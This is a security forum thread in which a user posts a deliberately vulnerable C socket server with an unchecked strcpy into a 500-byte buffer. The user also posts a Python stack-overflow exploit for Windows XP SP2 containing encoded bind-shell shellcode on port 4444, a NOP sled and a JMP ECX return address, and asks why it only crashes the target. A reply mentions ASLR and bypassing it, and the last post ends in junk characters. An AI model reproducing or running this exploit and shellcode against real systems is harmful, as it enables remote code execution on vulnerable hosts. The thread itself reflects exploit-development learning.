• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

help in writing exploits win32 xp sp2

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses

View previous topic :: View next topic  
Author Message
abhijit_mohanta
Just Arrived
Just Arrived


Joined: 17 Jan 2009
Posts: 0


Offline

PostPosted: Wed Jan 21, 2009 8:33 am    Post subject: help in writing exploits win32 xp sp2 Reply with quote

I am bit new to exploitation.But I know the basics.I have to write exploit for the following C code
---------------------------------------------------
Code:
#include <iostream>
#include <winsock.h>
#include <windows.h>

//load windows socket
#pragma comment(lib, "wsock32.lib")

//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0


void pr( char *str)
{   
   char buf[500]="";   
   strcpy(buf,str);
}
void sError(char *str)
{
   MessageBox (NULL, str, "socket Error" ,MB_OK);
   WSACleanup();
}


int main(int argc, char **argv)
{



WORD sockVersion;
WSADATA wsaData;

int rVal;
char Message[5000]="";
char buf[2000]="";   

u_short LocalPort;
LocalPort = 200;

//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);

//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);

if(serverSocket == INVALID_SOCKET)
{
   sError("Failed socket()");
   return SS_ERROR;
}

SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;

//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
   sError("Failed bind()");
   WSACleanup();
   return SS_ERROR;
}

//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
   sError("Failed listen()");
   WSACleanup();
   return SS_ERROR;
}

//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
   sError("Failed accept()");
   WSACleanup();
   return SS_ERROR;
}

int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
   //receive the data that is being sent by the client max limit to 5000 bytes.
   bytesRecv = recv( clientSocket, Message, 5000, 0 );
   
   if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
   {
      printf( "\nConnection Closed.\n");
      break;
   }
}

//Pass the data received to the function pr
pr(Message);

//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);

WSACleanup();

return SS_OK;
}

----------------------------------------------------

I complied the code on devcpp on windows xp sp2 (so no stack protection canarie)
After sending a pattern I find out that ECX points to the first character of our input eip overwritten at 524 bytes.
ESP points to string at the 528 character

so I find a jmp ECX.
and create a pattern like [AAA...524][BBBB][CCCC..]
I find EIP overwritten with BBBB
So in explot I replace BBBB with the address of JMP ECX

So I send the following exploit

C:>python exploit.py|nc localhost 200
exploit.py
-------------------------------------------------------------------------

buffer = '\x90' * 100


buffer += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
buffer += "\x3f\x2a\xbd\x83\xeb\xfc\xe2\xf4\x79\x55\xc1\xf0\x6d\xc6\xd5\x42"
buffer += "\x7a\x5f\xa1\xd1\xa1\x1b\xa1\xf8\xb9\xb4\x56\xb8\xfd\x3e\xc5\x36"
buffer += "\xca\x27\xa1\xe2\xa5\x3e\xc1\xf4\x0e\x0b\xa1\xbc\x6b\x0e\xea\x24"
buffer += "\x29\xbb\xea\xc9\x82\xfe\xe0\xb0\x84\xfd\xc1\x49\xbe\x6b\x0e\x95"
buffer += "\xf0\xda\xa1\xe2\xa1\x3e\xc1\xdb\x0e\x33\x61\x36\xda\x23\x2b\x56"
buffer += "\x86\x13\xa1\x34\xe9\x1b\x36\xdc\x46\x0e\xf1\xd9\x0e\x7c\x1a\x36"
buffer += "\xc5\x33\xa1\xcd\x99\x92\xa1\xfd\x8d\x61\x42\x33\xcb\x31\xc6\xed"
buffer += "\x7a\xe9\x4c\xee\xe3\x57\x19\x8f\xed\x48\x59\x8f\xda\x6b\xd5\x6d"
buffer += "\xed\xf4\xc7\x41\xbe\x6f\xd5\x6b\xda\xb6\xcf\xdb\x04\xd2\x22\xbf"
buffer += "\xd0\x55\x28\x42\x55\x57\xf3\xb4\x70\x92\x7d\x42\x53\x6c\x79\xee"
buffer += "\xd6\x6c\x69\xee\xc6\x6c\xd5\x6d\xe3\x57\x3b\xe1\xe3\x6c\xa3\x5c"
buffer += "\x10\x57\x8e\xa7\xf5\xf8\x7d\x42\x53\x55\x3a\xec\xd0\xc0\xfa\xd5"
buffer += "\x21\x92\x04\x54\xd2\xc0\xfc\xee\xd0\xc0\xfa\xd5\x60\x76\xac\xf4"
buffer += "\xd2\xc0\xfc\xed\xd1\x6b\x7f\x42\x55\xac\x42\x5a\xfc\xf9\x53\xea"
buffer += "\x7a\xe9\x7f\x42\x55\x59\x40\xd9\xe3\x57\x49\xd0\x0c\xda\x40\xed"
buffer += "\xdc\x16\xe6\x34\x62\x55\x6e\x34\x67\x0e\xea\x4e\x2f\xc1\x68\x90"
buffer += "\x7b\x7d\x06\x2e\x08\x45\x12\x16\x2e\x94\x42\xcf\x7b\x8c\x3c\x42"
buffer += "\xf0\x7b\xd5\x6b\xde\x68\x78\xec\xd4\x6e\x40\xbc\xd4\x6e\x7f\xec"
buffer += "\x7a\xef\x42\x10\x5c\x3a\xe4\xee\x7a\xe9\x40\x42\x7a\x08\xd5\x6d"
buffer += "\x0e\x68\xd6\x3e\x41\x5b\xd5\x6b\xd7\xc0\xfa\xd5\x75\xb5\x2e\xe2"
buffer += "\xd6\xc0\xfc\x42\x55\x3f\x2a\xbd"

buffer += '\x90' * 100
buffer += '\xC3\x2C\x82\x77' #jmp ECX
buffer += '\x90'*100

print buffer


#jmp eax 77822CC3,7C85D2F4 shellcode size 324 eip overwrites at 524
-----------------------------------------------------------
The above shellcode is for tcp connect opens a port at 4444.I have tested the shellcode.It works fine .
But I dont find the exploit working.
I simply crashes the program.
Please suggest me why so.

Please help as soon as possible
I have tested the shellcode

Moderator note: added code tags - capi
Back to top
View user's profile Send private message
clonmac
Just Arrived
Just Arrived


Joined: 09 Mar 2009
Posts: 0


Offline

PostPosted: Mon Apr 13, 2009 5:54 pm    Post subject: Reply with quote

Have you varified that the computer running the process is not using address space layout randomization (ASLR)?

When you debug to find the values of eip, debug several times to ensure that the eip location stays the same each time you run it. If it changes every time, then the computer is using ASLR which means that your exploit the way it is written won't work. There are ways around ASLR though.
Back to top
View user's profile Send private message Visit poster's website
c0d3r
Just Arrived
Just Arrived


Joined: 21 Jul 2009
Posts: 0


Offline

PostPosted: Wed Jul 22, 2009 12:14 pm    Post subject: Re: help in writing exploits win32 xp sp2 Reply with quote

Did you manage to get it to work ?

Moderator note: removed full quote of lengthy original post - capi
Back to top
View user's profile Send private message
reitchelazan
Just Arrived
Just Arrived


Joined: 30 May 2010
Posts: 0


Offline

PostPosted: Sun May 30, 2010 3:53 pm    Post subject: Reply with quote

I'm new in c++ I have tryed out rhis code but it get too many errors Sad I give up.

астигматизм59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t
59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t
59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t
59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t
59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t
59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t
59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t
59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t59t
Back to top
View user's profile Send private message
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register